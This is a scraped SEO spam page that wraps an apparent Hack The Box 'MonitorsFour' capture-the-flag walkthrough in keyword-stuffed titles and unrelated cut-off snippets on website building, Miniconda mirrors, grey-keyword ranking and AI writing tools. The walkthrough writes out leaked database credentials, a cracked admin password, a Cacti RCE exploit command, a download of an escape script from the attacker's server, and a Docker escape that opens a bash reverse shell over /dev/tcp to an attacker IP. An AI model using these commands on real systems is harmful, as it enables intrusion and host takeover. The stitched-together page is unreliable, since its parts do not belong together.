培训班该如何建站推荐做流程图的网站-万宁市网站建设公司-Seo优化

培训班该如何建站,推荐做流程图的网站,手机定制app,个门户网站靶机概览 HTB MonitorsFour 是一台难度评级为 EASY 的 Windows 靶机。该靶机以企业监控环境为背景#xff0c;主要攻击路径围绕信息泄漏、服务枚举、已知漏洞利用#xff08;CVE#xff09;与容器逃逸展开。从外部 Web 应用入手#xff0c;通过配置文件泄露获取凭据…靶机概览HTB MonitorsFour 是一台难度评级为 EASY 的 Windows 靶机。该靶机以企业监控环境为背景主要攻击路径围绕信息泄漏、服务枚举、已知漏洞利用CVE与容器逃逸展开。从外部 Web 应用入手通过配置文件泄露获取凭据利用 Cacti 系统的高危 RCE 漏洞进入容器内部最终借助 Docker Desktop 的容器逃逸漏洞突破边界成功控制底层 Windows 宿主系统。整个过程清晰地展示了从外网渗透到容器逃逸的完整链条为理解 Windows 环境下容器化服务的常见安全风险与攻击面提供了典型的实战案例。信息收集端口扫描使用 Rustscan 和 Nmap 进行初步扫描rustscan -a 10.10.11.98 --ulimit 5000nmap -sV -sC -p 80,5985 10.10.11.98 -Pn -v发现服务80/tcp - HTTP (nginx) - 重定向到 monitorsfour.htb5985/tcp - HTTP (Microsoft HTTPAPI) - WinRM 服务子域名枚举使用 FFuF 进行子域名枚举ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt \ -H Host: FUZZ.monitorsfour.htb \ -u http://monitorsfour.htb \ -fs 138发现子域名cacti.monitorsfour.htb - Cacti 监控系统目录枚举使用 dirsearch 发现敏感文件dirsearch -u http://monitorsfour.htb -e php,html,js,json,txt关键发现/.env - 包含数据库凭据/user - API 端点/login - 登录页面初始访问数据库信息泄漏访问http://monitorsfour.htb/.env泄露数据库配置DB_HOSTmariadb DB_PORT3306 DB_NAMEmonitorsfour_db DB_USERmonitorsdbuser DB_PASSf37p2j8f4t0r未授权信息泄露访问http://monitorsfour.htb/api/v1/users?token0idx返回用户数据包含[ { id: 2, username: admin, email: adminmonitorsfour.htb, password: 56b32eb43e6f15395f6c46c1c9e1cd36, role: super user, token: d8a25ad7bdb87198d0, name: Marcus Higgins, position: System Administrator } // ... 其他用户 ]密码破解使用 CrackStation 破解 MD5 哈希56b32eb43e6f15395f6c46c1c9e1cd36→wonderful1访问管理面板使用凭据admin:wonderful1成功登录查看更新日志访问http://monitorsfour.htb/admin/changelog关键更新V.1.9 (June 2, 2025) - API 用户集成支持令牌认证V.1.7 (May 16, 2025) - 迁移到 Windows 和 Docker Desktop 4.44.2V.1.6 (May 1, 2025) - 修复忘记密码功能的 SQL 注入漏洞CVE-2025-24367 - Cacti RCE 漏洞搜索发现 Cacti 1.2.28 存在 RCE 漏洞CVE-2025-24367对于漏洞利用需要已认证的Cacti用户枚举 Cacti 用户使用 Burp Suite 对http://cacti.monitorsfour.htb/进行爆破成功获取凭据marcus:wonderful1获取反向 Shell使用公开的 PoCpython3 exploit.py -u marcus -p wonderful1 -i 10.10.16.11 -l 4033 -url http://cacti.monitorsfour.htb环境探测检查挂载点mount发现是容器环境路径中包含 desktop-containerd这明确指向 Docker Desktop 环境changelog说明了其版本为4.44.2。Docker Desktop 逃逸漏洞 - CVE-2025-9074搜索发现 Docker Desktop 4.44.2 存在容器逃逸漏洞CVE-2025-9074访问 Docker APIcurl -s http://192.168.65.7:2375/version成功访问 Docker API确认存在未受保护的 Docker 守护进程。Docker 逃逸准备 POC攻击机开启 HTTP 服务器python3 -m http.server 8033容器内下载curl http://10.10.16.11:8033/cve-2025-9074.sh -o cve-2025-9074.sh执行容器逃逸./cve-2025-9074.sh 192.168.65.7 bash -c bash -i /dev/tcp/10.10.16.11/1033 01 2375成功获得 root shellFlag 获取获取 user flagcat /host_root/run/desktop/mnt/host/c/Users/marcus/Desktop/user.txt获取 root flagcat /host_root/run/desktop/mnt/host/c/Users/Administrator/Desktop/root.txt

制作外贸网站公司灰色词快速排名方法

清华源配置Miniconda后仍慢？检查这5个网络设置在人工智能项目开发中，一个常见的场景是：你已经按照教程将 Miniconda 配置为使用清华大学镜像源，信心满满地运行 conda install pytorch，结果命令行却卡在“Solving env…

张小明 2026/1/9 12:27:59 网站建设

北京网站页面设计9.9网站怎么做

目录具体实现截图项目介绍论文大纲核心代码部分展示项目运行指导结论源码获取详细视频演示 ：文章底部获取博主联系方式！同行可合作具体实现截图本系统（程序源码数据库调试部署讲解）同时还支持java、ThinkPHP、Node.js、Spring B…

张小明 2026/1/7 13:51:02 网站建设

400网站总机阿里云个人做网站公司

大模型领域前景广阔但充满挑战，就业需求旺盛但门槛高。从业者需精通深度学习、NLP等核心技术，具备Python编程能力和框架应用经验。建议参与开源项目、持续学习行业动态，拓展跨领域能力。保研生应明确研究方向，选择有实力的院校和导…

张小明 2026/1/7 15:49:28 网站建设

衡水外贸网站建设wordpress求助

单台输送机IIA 手册第2章~第4章介绍了单台输送机从整机设计、设计计算、部件选型的设计过程。多台输送机但是，在实际应用中，输送机作为单台设备运转的情况是比较少见的。一般都是多台输送机联合运转或是与工艺设备组合完成某种工艺生产过程&…

张小明 2026/1/7 13:37:18 网站建设

国内网站有哪些人力资源外包收费报价表

Cytiva不断自我超越，创新不止。2024年4月，Cytiva在全球上市superSEC填料，专门为使用分子筛进行生物大分子的大规模纯化而设计，如外泌体、包膜病毒、质粒和mRNA等。superSEC为改良的高度交联琼脂糖骨架，具有更优越的流速…

张小明 2026/1/7 5:50:23 网站建设

模版网站平面设计广告设计

导师推荐！9款AI论文写作软件测评：本科生毕业论文必备 2025年AI论文写作工具测评：为什么你需要这份榜单？ 随着人工智能技术的不断进步，越来越多的本科生开始借助AI工具提升论文写作效率。然而，面对市场上琳琅…

张小明 2026/1/7 15:49:22 网站建设